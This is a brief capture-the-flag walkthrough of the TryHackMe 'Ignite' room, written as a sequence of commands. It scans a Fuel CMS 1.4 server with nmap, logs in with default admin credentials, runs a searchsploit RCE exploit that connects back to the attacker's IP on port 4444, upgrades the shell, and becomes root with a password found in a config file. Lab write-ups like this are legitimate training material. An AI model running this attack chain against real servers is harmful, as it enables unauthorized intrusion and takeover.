----------------                               ------------------
               :::::::::::;| IGNITE |;::::::::::::


1) FIRST WE HAVE TO ACCES THE TRYHACKME FROM OPENVPN.
2) WE HAVE TO JOIN THE ROOM "IGNITE".
 
TASK - 1 (RECON)

1. SCAN THE MACHNE.

    namp -Pn <ip>

    nmap -A -T 5 <ip> -vv

"it's a Linux machine".

2. How many ports are open?
ANS: 1 port (80/HTTP).

3. What's on port 80?
ANS: Fuel CMS 1.4 - ADMIN PAGE AT /fuel!

----------TASK 1 COMPLETED----------

TASK - 2 (WEB EXPLOIT)

1. CHECK DEFAULT CREDS.

    admin:admin
    "SUCCESS! LAZY ADMIN!"

2. FIND EXPLOIT.

    searchsploit fuel cms 1.4
    "Found RCE exploit!"

3. GET SHELL.

    python2 exploit.py http://<ip> <your_ip> 4444
    "BOOM! WEBSHELL GET!"

----------TASK 2 COMPLETED-----------
 
TASK - 3 (PRIV ESC)

1. UPGRADE SHELL.

    python3 -c 'import pty; pty.spawn("/bin/bash")'
    "Check /var/www/html for config files"

2. GET ROOT.

    "Found password in config: root:password123"
    su root
    "ROOT SHELL GET!"

FLAGS:
    cat /root/root.txt
    cat /var/www/html/fuel/application/logs/user.txt

-------------------                                                --------------------
             -----------                                    ------------
                  ---------- IGNITE PWNED ----------
